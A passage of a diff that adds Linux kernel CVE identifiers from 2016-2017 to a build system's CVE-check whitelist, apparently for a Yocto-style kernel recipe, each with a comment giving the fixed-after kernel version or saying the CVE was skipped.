+CVE_CHECK_WHITELIST += "CVE-2016-6327"
+
+# fixed-version: Fixed after version 4.8rc3
+CVE_CHECK_WHITELIST += "CVE-2016-6480"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6516"
+
+# Skipping CVE-2016-6753, no affected_versions
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6786"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6787"
+
+# fixed-version: Fixed after version 4.8rc5
+CVE_CHECK_WHITELIST += "CVE-2016-6828"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-7039"
+
+# fixed-version: Fixed after version 4.9rc3
+CVE_CHECK_WHITELIST += "CVE-2016-7042"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7097"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7117"
+
+# Skipping CVE-2016-7118, no affected_versions
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7425"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7910"
+
+# fixed-version: Fixed after version 4.7rc7
+CVE_CHECK_WHITELIST += "CVE-2016-7911"
+
+# fixed-version: Fixed after version 4.6rc5
+CVE_CHECK_WHITELIST += "CVE-2016-7912"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7913"
+
+# fixed-version: Fixed after version 4.6rc4
+CVE_CHECK_WHITELIST += "CVE-2016-7914"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7915"
+
+# fixed-version: Fixed after version 4.6rc7
+CVE_CHECK_WHITELIST += "CVE-2016-7916"
+
+# fixed-version: Fixed after version 4.5rc6
+CVE_CHECK_WHITELIST += "CVE-2016-7917"
+
+# fixed-version: Fixed after version 4.9
+CVE_CHECK_WHITELIST += "CVE-2016-8399"
+
+# Skipping CVE-2016-8401, no affected_versions
+
+# Skipping CVE-2016-8402, no affected_versions
+
+# Skipping CVE-2016-8403, no affected_versions
+
+# Skipping CVE-2016-8404, no affected_versions
+
+# fixed-version: Fixed after version 4.10rc6
+CVE_CHECK_WHITELIST += "CVE-2016-8405"
+
+# Skipping CVE-2016-8406, no affected_versions
+
+# Skipping CVE-2016-8407, no affected_versions
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-8630"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-8632"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-8633"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2016-8636"
+
+# fixed-version: Fixed after version 4.9rc6
+CVE_CHECK_WHITELIST += "CVE-2016-8645"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2016-8646"
+
+# fixed-version: Fixed after version 4.9rc7
+CVE_CHECK_WHITELIST += "CVE-2016-8650"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-8655"
+
+# fixed-version: Fixed after version 4.8rc7
+CVE_CHECK_WHITELIST += "CVE-2016-8658"
+
+# CVE-2016-8660 has no known resolution
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-8666"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-9083"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-9084"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9120"
+
+# fixed-version: Fixed after version 4.8rc7
+CVE_CHECK_WHITELIST += "CVE-2016-9178"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2016-9191"
+
+# fixed-version: Fixed after version 4.9rc3
+CVE_CHECK_WHITELIST += "CVE-2016-9313"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-9555"
+
+# fixed-version: Fixed after version 4.9
+CVE_CHECK_WHITELIST += "CVE-2016-9576"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9588"
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2016-9604"
+
+# Skipping CVE-2016-9644, no affected_versions
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9685"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9754"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-9755"
+
+# fixed-version: Fixed after version 4.9rc7
+CVE_CHECK_WHITELIST += "CVE-2016-9756"
+
+# fixed-version: Fixed after version 4.9rc7
+CVE_CHECK_WHITELIST += "CVE-2016-9777"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-9793"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9794"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9806"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-9919"
+
+# Skipping CVE-2017-0403, no affected_versions
+
+# Skipping CVE-2017-0404, no affected_versions
+
+# Skipping CVE-2017-0426, no affected_versions
+
+# Skipping CVE-2017-0427, no affected_versions
+
+# CVE-2017-0507 has no known resolution
+
+# CVE-2017-0508 has no known resolution
+
+# Skipping CVE-2017-0510, no affected_versions
+
+# Skipping CVE-2017-0528, no affected_versions
+
+# Skipping CVE-2017-0537, no affected_versions
+
+# CVE-2017-0564 has no known resolution
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-0605"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-0627"
+
+# CVE-2017-0630 has no known resolution
+
+# CVE-2017-0749 has no known resolution
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2017-0750"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-0786"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2017-0861"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000111"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000112"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000251"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000252"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000253"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000255"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-1000363"
+
+# fixed-version: Fixed after version 4.12rc6
+CVE_CHECK_WHITELIST += "CVE-2017-1000364"
+
+# fixed-version: Fixed after version 4.12rc7
+CVE_CHECK_WHITELIST += "CVE-2017-1000365"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000370"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000371"
+
+# fixed-version: Fixed after version 4.12rc6
+CVE_CHECK_WHITELIST += "CVE-2017-1000379"
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000380"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2017-1000405"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2017-1000407"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2017-1000410"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-10661"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-10662"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-10663"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-10810"
+
+# fixed-version: Fixed after version 4.12rc7
+CVE_CHECK_WHITELIST += "CVE-2017-10911"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-11089"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-11176"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-11472"
+
+# fixed-version: Fixed after version 4.13rc2
+CVE_CHECK_WHITELIST += "CVE-2017-11473"
+
+# fixed-version: Fixed after version 4.13
+CVE_CHECK_WHITELIST += "CVE-2017-11600"
+
+# fixed-version: Fixed after version 4.13rc6
+CVE_CHECK_WHITELIST += "CVE-2017-12134"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-12146"
+
+# fixed-version: Fixed after version 4.14rc2
+CVE_CHECK_WHITELIST += "CVE-2017-12153"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-12154"
+
+# fixed-version: Fixed after version 4.9rc6
+CVE_CHECK_WHITELIST += "CVE-2017-12168"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-12188"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-12190"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-12192"
+
+# fixed-version: Fixed after version 4.14rc7
+CVE_CHECK_WHITELIST += "CVE-2017-12193"
+
+# fixed-version: Fixed after version 4.13rc4
+CVE_CHECK_WHITELIST += "CVE-2017-12762"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-13080"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-13166"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2017-13167"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2017-13168"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2017-13215"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2017-13216"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2017-13220"
+
+# CVE-2017-13221 has no known resolution
+
+# CVE-2017-13222 has no known resolution
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-13305"
+
+# fixed-version: Fixed after version 4.13rc7
+CVE_CHECK_WHITELIST += "CVE-2017-13686"
+
+# CVE-2017-13693 has no known resolution
+
+# CVE-2017-13694 has no known resolution
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2017-13695"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2017-13715"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-14051"
+
+# fixed-version: Fixed after version 4.12rc3
+CVE_CHECK_WHITELIST += "CVE-2017-14106"
+
+# fixed-version: Fixed after version 4.13rc6
+CVE_CHECK_WHITELIST += "CVE-2017-14140"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-14156"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-14340"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-14489"
+
+# fixed-version: Fixed after version 4.13
+CVE_CHECK_WHITELIST += "CVE-2017-14497"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-14954"
+
+# fixed-version: Fixed after version 4.14rc2
+CVE_CHECK_WHITELIST += "CVE-2017-14991"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2017-15102"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-15115"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2017-15116"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-15121"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-15126"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2017-15127"
+
+# fixed-version: Fixed after version 4.14rc8
+CVE_CHECK_WHITELIST += "CVE-2017-15128"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-15129"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-15265"
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-15274"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-15299"
+
+# fixed-version: Fixed after version 4.14rc7
+CVE_CHECK_WHITELIST += "CVE-2017-15306"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-15537"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-15649"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2017-15868"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-15951"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16525"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16526"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16527"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16528"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16529"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16530"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16531"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16532"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16533"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16534"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-16535"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16536"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16537"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16538"
+
+# fixed-version: Fixed after version 4.14rc7
+CVE_CHECK_WHITELIST += "CVE-2017-16643"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16644"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2017-16645"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16646"
+
+# fixed-version: Fixed after version 4.14
+CVE_CHECK_WHITELIST += "CVE-2017-16647"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16648"
+
+# fixed-version: Fixed after version 4.14
+CVE_CHECK_WHITELIST += "CVE-2017-16649"
+
+# fixed-version: Fixed after version 4.14
+CVE_CHECK_WHITELIST += "CVE-2017-16650"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16911"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16912"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16913"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-16914"
+
+# fixed-version: Fixed after version 4.14rc7
+CVE_CHECK_WHITELIST += "CVE-2017-16939"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-16994"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16995"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-16996"
+
+# fixed-version: Fixed after version 4.13rc7
+CVE_CHECK_WHITELIST += "CVE-2017-17052"
+
+# fixed-version: Fixed after version 4.13rc7
+CVE_CHECK_WHITELIST += "CVE-2017-17053"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17448"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17449"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17450"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17558"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17712"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17741"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17805"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-17806"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2017-17807"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17852"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17853"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17854"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17855"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17856"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17857"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-17862"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17863"
+
+# fixed-version: Fixed after version 4.15rc5
+CVE_CHECK_WHITELIST += "CVE-2017-17864"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2017-17975"
+
+# fixed-version: Fixed after version 4.11rc7
+CVE_CHECK_WHITELIST += "CVE-2017-18017"
+
+# fixed-version: Fixed after version 4.15rc7
+CVE_CHECK_WHITELIST += "CVE-2017-18075"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18079"
+
+# CVE-2017-18169 has no known resolution
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18174"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18193"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-18200"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2017-18202"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18203"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18204"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2017-18208"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18216"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18218"
+
+# fixed-version: Fixed after version 4.12rc4
+CVE_CHECK_WHITELIST += "CVE-2017-18221"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18222"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18224"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18232"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18241"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18249"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18255"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18257"
+
+# fixed-version: Fixed after version 4.13rc6
+CVE_CHECK_WHITELIST += "CVE-2017-18261"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-18270"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2017-18344"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-18360"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2017-18379"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18509"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18549"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18550"
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2017-18551"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-18552"
+
+# fixed-version: Fixed after version 4.15rc6
+CVE_CHECK_WHITELIST += "CVE-2017-18595"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-2583"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-2584"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-2596"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-2618"
+
+# fixed-version: Fixed after version 2.6.25rc1
+CVE_CHECK_WHITELIST += "CVE-2017-2634"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-2636"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2017-2647"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-2671"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-5123"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-5546"
+
+# fixed-version: Fixed after version 4.10rc5
+CVE_CHECK_WHITELIST += "CVE-2017-5547"
+
+# fixed-version: Fixed after version 4.10rc5
+CVE_CHECK_WHITELIST += "CVE-2017-5548"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-5549"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-5550"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-5551"
+
+# fixed-version: Fixed after version 4.10rc6
+CVE_CHECK_WHITELIST += "CVE-2017-5576"
+
+# fixed-version: Fixed after version 4.10rc6
+CVE_CHECK_WHITELIST += "CVE-2017-5577"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-5669"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5715"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5753"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-5754"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5897"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-5967"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5970"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2017-5972"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-5986"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-6001"
+
+# fixed-version: Fixed after version 4.10
+CVE_CHECK_WHITELIST += "CVE-2017-6074"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-6214"
+
+# fixed-version: Fixed after version 4.10
+CVE_CHECK_WHITELIST += "CVE-2017-6345"
+
+# fixed-version: Fixed after version 4.10
+CVE_CHECK_WHITELIST += "CVE-2017-6346"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-6347"
+
+# fixed-version: Fixed after version 4.10
+CVE_CHECK_WHITELIST += "CVE-2017-6348"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-6353"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-6874"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2017-6951"
+
+# fixed-version: Fixed after version 4.11rc5
+CVE_CHECK_WHITELIST += "CVE-2017-7184"
+
+# fixed-version: Fixed after version 4.11rc5
+CVE_CHECK_WHITELIST += "CVE-2017-7187"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-7261"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2017-7273"
+
+# fixed-version: Fixed after version 4.11rc4
+CVE_CHECK_WHITELIST += "CVE-2017-7277"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-7294"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-7308"
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-7346"
+
+# CVE-2017-7369 has no known resolution
+
+# fixed-version: Fixed after version 4.11rc4
+CVE_CHECK_WHITELIST += "CVE-2017-7374"
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2017-7472"
+
+# fixed-version: Fixed after version 4.11
+CVE_CHECK_WHITELIST += "CVE-2017-7477"
+
+# fixed-version: Fixed after version 4.12rc7
+CVE_CHECK_WHITELIST += "CVE-2017-7482"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-7487"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2017-7495"
+
+# fixed-version: Fixed after version 4.12rc7
+CVE_CHECK_WHITELIST += "CVE-2017-7518"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-7533"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-7541"
+
+# fixed-version: Fixed after version 4.13rc2
+CVE_CHECK_WHITELIST += "CVE-2017-7542"
+
+# fixed-version: Fixed after version 4.13
+CVE_CHECK_WHITELIST += "CVE-2017-7558"
+
+# fixed-version: Fixed after version 4.11rc6
+CVE_CHECK_WHITELIST += "CVE-2017-7616"
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2017-7618"
+
+# fixed-version: Fixed after version 4.11
+CVE_CHECK_WHITELIST += "CVE-2017-7645"
+
+# fixed-version: Fixed after version 4.11rc7
+CVE_CHECK_WHITELIST += "CVE-2017-7889"
+
+# fixed-version: Fixed after version 4.11
+CVE_CHECK_WHITELIST += "CVE-2017-7895"
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2017-7979"
+
+# fixed-version: Fixed after version 4.11rc4
